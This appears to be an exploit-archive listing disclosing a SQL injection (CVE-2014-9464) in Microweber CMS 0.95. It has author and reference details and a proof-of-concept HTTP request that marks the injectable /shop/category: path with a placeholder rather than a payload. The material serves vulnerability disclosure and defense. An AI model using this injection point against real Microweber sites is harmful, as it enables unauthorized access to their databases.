Skip to content
cyberexploits
webappphptext

Microweber CMS 0.95 - SQL Injection

Microweber CMS 0.95 - SQL Injection

Publié le 2015-01-07

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/35720.txt7eac4c3a
raw
# Exploit Title: SQL Injection in Microweber CMS 0.95

# Google Dork: N/A

# Date: 12/16/2014

# Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) and ITAS Team (www.itas.vn)

# Vendor Homepage: Microweber (https://microweber.com/)

# Software Link: https://github.com/microweber/microweber

# Version: 0.95

# Tested on: N/A

# CVE : CVE-2014-9464



::PROOF OF CONCEPT::



GET /shop/category:[SQL INJECTION HERE] HTTP/1.1

Host: target.org

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://target/shop

Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275

Connection: keep-alive



::REFERENCE::

- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-microweber-cms-69.html

- https://www.youtube.com/watch?v=SSE8Xj_-QaQ

- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9464



::DISCLAIMER::

THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
Voir sur GitHub